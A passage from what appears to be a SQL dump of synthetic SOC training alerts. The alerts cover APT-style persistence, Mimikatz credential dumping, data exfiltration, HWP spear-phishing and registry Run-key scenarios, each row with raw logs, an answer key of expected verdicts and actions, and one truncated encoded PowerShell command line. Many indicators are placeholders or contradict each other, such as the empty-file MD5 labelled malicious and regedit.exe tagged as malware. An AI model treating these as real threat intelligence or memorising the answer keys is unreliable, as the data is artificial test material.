The service file has a suspicious hash.\\\",\\\"tags\\\":[\\\"Lazarus Group\\\",\\\"Persistence\\\",\\\"APT\\\"]}\"},{\"timestamp\":\"2026-03-15T20:57:14.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":7045,\\\"timestamp\\\":\\\"2023-10-15T02:14:07Z\\\",\\\"computer_name\\\":\\\"compromised_host01\\\",\\\"user\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\msupdate.exe\\\",\\\"service_type\\\":\\\"Own Process\\\",\\\"start_type\\\":\\\"Auto Start\\\",\\\"ip_address\\\":\\\"10.0.0.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"sha256\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A new service was installed in the system which is not known to be legitimate. The service file has a suspicious hash.\\\",\\\"tags\\\":[\\\"Lazarus Group\\\",\\\"Persistence\\\",\\\"APT\\\"]}\"},{\"timestamp\":\"2026-03-15T20:56:14.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":7045,\\\"timestamp\\\":\\\"2023-10-15T02:14:07Z\\\",\\\"computer_name\\\":\\\"compromised_host01\\\",\\\"user\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\msupdate.exe\\\",\\\"service_type\\\":\\\"Own Process\\\",\\\"start_type\\\":\\\"Auto Start\\\",\\\"ip_address\\\":\\\"10.0.0.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"sha256\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A new service was installed in the system which is not known to be legitimate. 
The service file has a suspicious hash.\\\",\\\"tags\\\":[\\\"Lazarus Group\\\",\\\"Persistence\\\",\\\"APT\\\"]}\"},{\"timestamp\":\"2026-03-15T20:55:14.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":7045,\\\"timestamp\\\":\\\"2023-10-15T02:14:07Z\\\",\\\"computer_name\\\":\\\"compromised_host01\\\",\\\"user\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\msupdate.exe\\\",\\\"service_type\\\":\\\"Own Process\\\",\\\"start_type\\\":\\\"Auto Start\\\",\\\"ip_address\\\":\\\"10.0.0.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"sha256\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A new service was installed in the system which is not known to be legitimate. The service file has a suspicious hash.\\\",\\\"tags\\\":[\\\"Lazarus Group\\\",\\\"Persistence\\\",\\\"APT\\\"]}\"},{\"timestamp\":\"2026-03-15T20:54:14.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":7045,\\\"timestamp\\\":\\\"2023-10-15T02:14:07Z\\\",\\\"computer_name\\\":\\\"compromised_host01\\\",\\\"user\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\msupdate.exe\\\",\\\"service_type\\\":\\\"Own Process\\\",\\\"start_type\\\":\\\"Auto Start\\\",\\\"ip_address\\\":\\\"10.0.0.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"sha256\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A new service was installed in the system which is not known to be legitimate. 
The service file has a suspicious hash.\\\",\\\"tags\\\":[\\\"Lazarus Group\\\",\\\"Persistence\\\",\\\"APT\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1479, 'Lateral Movement Across Network', 'high', 'Network Traffic Analysis', 'Utilizing harvested credentials, the attackers moved laterally within the network, targeting additional systems in the nuclear and energy sectors. This activity is consistent with advanced persistent threats known for targeting critical infrastructure.', 'Credential Dumping', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.1.1.25\",\"username\":\"jdoe\",\"filename\":\"mimikatz.exe\",\"hash\":\"4bfa3a6d5ac6a7f8a3b0a9a7f5c3e2b1\",\"event_type\":\"lateral_movement\",\"network_protocol\":\"SMB\",\"action\":\"credential_dumping\",\"malware_tool\":\"Mimikatz\",\"notes\":\"The attacker used Mimikatz to extract credentials and moved laterally to 10.1.1.25, a critical system within the network.\"}', '2026-03-15 19:07:00', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Lazarus Group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Critical system within the nuclear sector.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Mimikatz is a known tool for credential 
dumping.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"4bfa3a6d5ac6a7f8a3b0a9a7f5c3e2b1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1480, 'Exfiltration of Sensitive Data', 'critical', 'Data Loss Prevention (DLP) Tools', 'The Lazarus Group has initiated data exfiltration targeting critical defense strategies and nuclear research. This could lead to severe national security implications.', 'Data Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:23Z\",\"event\":\"data_exfiltration\",\"source_ip\":\"192.168.45.12\",\"destination_ip\":\"203.0.113.57\",\"filename\":\"nuclear_research_plans.pdf\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\",\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"dlp_policy_triggered\":\"Sensitive Data Exfiltration\",\"malware_tool_used\":\"custom_exfil_tool_v1.2\"}', '2026-03-15 19:07:00', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Lazarus Group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.45.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised host within the internal network.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"nuclear_research_plans.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Local DLP\",\"verdict\":\"suspicious\",\"details\":\"File matches patterns of sensitive documents.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash identified in previous Lazarus Group campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account. 
Possible credential compromise.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:14.869Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:23Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.57\\\",\\\"filename\\\":\\\"nuclear_research_plans.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_tool_used\\\":\\\"custom_exfil_tool_v1.2\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:14.869Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:23Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.57\\\",\\\"filename\\\":\\\"nuclear_research_plans.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_tool_used\\\":\\\"custom_exfil_tool_v1.2\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:14.869Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:23Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.57\\\",\\\"filename\\\":\\\"nuclear_research_plans.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_tool_used\\\":\\\"custom_exfil_tool_v1.2\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:14.869Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:23Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.57\\\",\\\"filename\\\":\\\"nuclear_research_plans.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_tool_used\\\":\\\"custom_exfil_tool_v1.2\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:14.869Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:23Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.57\\\",\\\"filename\\\":\\\"nuclear_research_plans.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_tool_used\\\":\\\"custom_exfil_tool_v1.2\\\"}\"}],\"query\":\"index=main 
source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1481, 'Spear Phishing Attempt with Malicious HWP Attachment', 'high', 'Email Gateway Logs', 'A spear-phishing email containing a malicious HWP attachment was sent to an individual associated with a South Korean think tank. The email originated from a known malicious IP address linked to Kimsuky APT group.', 'Initial Access', 'T1566.001 - Spear Phishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T08:45:00Z\",\"email_subject\":\"Important Update on Seminar\",\"sender_email\":\"attacker@malicious-domain.com\",\"recipient_email\":\"victim@thinktank.kr\",\"attachment\":\"seminar_update.hwp\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.25\"}', '2026-03-15 19:07:24', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@malicious-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Tool X\",\"verdict\":\"malicious\",\"details\":\"Associated with Kimsuky APT campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as malicious HWP file\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP used by Kimsuky group\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Attempt with Malicious HWP 
Attachment\",\"date\":\"2026-03-15T20:58:14.876Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1482, 'Execution of GoldDragon Malware via HWP Exploit', 'critical', 'Endpoint Detection and Response (EDR)', 'The GoldDragon malware was executed on the victim\'s machine through a malicious HWP file containing an embedded exploit. This activity signifies a successful execution phase intended to establish a foothold in the system.', 'Execution', 'T1203 - Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"EDR-5678\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"user\":\"jdoe\",\"malware_name\":\"GoldDragon\",\"file_name\":\"malicious_file.hwp\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"execution_path\":\"C:\\\\Users\\\\jdoe\\\\Documents\\\\malicious_file.hwp\",\"process_id\":4321,\"alert_trigger\":{\"type\":\"exploit\",\"description\":\"HWP file exploit triggered GoldDragon execution\"}}', '2026-03-15 19:07:24', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by malware.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to GoldDragon malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_file.hwp\",\"is_critical\":false,\"osint_result\":{\"source\":\"Endpoint Logs\",\"verdict\":\"suspicious\",\"details\":\"File involved in exploit 
activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1483, 'Establishing Persistence with Registry Modifications', 'high', 'Registry Change Monitoring', 'The malware modifies the Windows Registry to ensure it runs on startup, allowing Kimsuky to regain control even after system reboots.', 'Persistence', 'T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:03:23Z\",\"event_id\":4657,\"user\":\"compromisedUser\",\"user_id\":\"S-1-5-21-1234567890-1234567890-1234567890-1001\",\"computer_name\":\"compromised-system\",\"registry_key\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value_name\":\"MaliciousStartup\",\"registry_value_data\":\"C:\\\\Users\\\\compromisedUser\\\\AppData\\\\Roaming\\\\malicious.exe\",\"process_name\":\"regedit.exe\",\"external_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.25\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-15 19:07:24', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Kimsuky APT group\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"regedit.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File identified as a variant of Kimsuky malware\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash known to be associated with Kimsuky malware\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromisedUser\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account on the compromised 
system\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:14.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:03:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"compromisedUser\\\",\\\"user_id\\\":\\\"S-1-5-21-1234567890-1234567890-1234567890-1001\\\",\\\"computer_name\\\":\\\"compromised-system\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromisedUser\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:14.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:03:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"compromisedUser\\\",\\\"user_id\\\":\\\"S-1-5-21-1234567890-1234567890-1234567890-1001\\\",\\\"computer_name\\\":\\\"compromised-system\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromisedUser\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:14.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:03:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"compromisedUser\\\",\\\"user_id\\\":\\\"S-1-5-21-1234567890-1234567890-1234567890-1001\\\",\\\"computer_name\\\":\\\"compromised-system\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromisedUser\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:14.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:03:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"compromisedUser\\\",\\\"user_id\\\":\\\"S-1-5-21-1234567890-1234567890-1234567890-1001\\\",\\\"computer_name\\\":\\\"compromised-system\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromisedUser\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:14.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:03:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"compromisedUser\\\",\\\"user_id\\\":\\\"S-1-5-21-1234567890-1234567890-1234567890-1001\\\",\\\"computer_name\\\":\\\"compromised-system\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromisedUser\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1484, 'Credential Dumping for Lateral Movement', 'high', 'Network Traffic Analysis', 'Detection of suspicious network traffic indicating credential dumping activity by Kimsuky APT group. The attacker utilized a known credential dumping tool to exfiltrate credentials from the compromised host 192.168.1.15, targeting additional systems for lateral movement.', 'Lateral Movement', 'T1003 Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:55Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"10.0.0.5\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"admin_user\",\"dump_tool\":\"mimikatz.exe\",\"hash\":\"3f7851f1c1b8a8f5f6d9a2d4f5e5e5f6\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\mimikatz.exe\",\"alert_id\":\"ALERT-20231012-0004\",\"action\":\"credential_dumping_attempt\",\"protocol\":\"SMB\",\"signature\":\"Suspicious Credential Dumping Tool Detected\"}', '2026-03-15 19:07:25', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised internal host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat 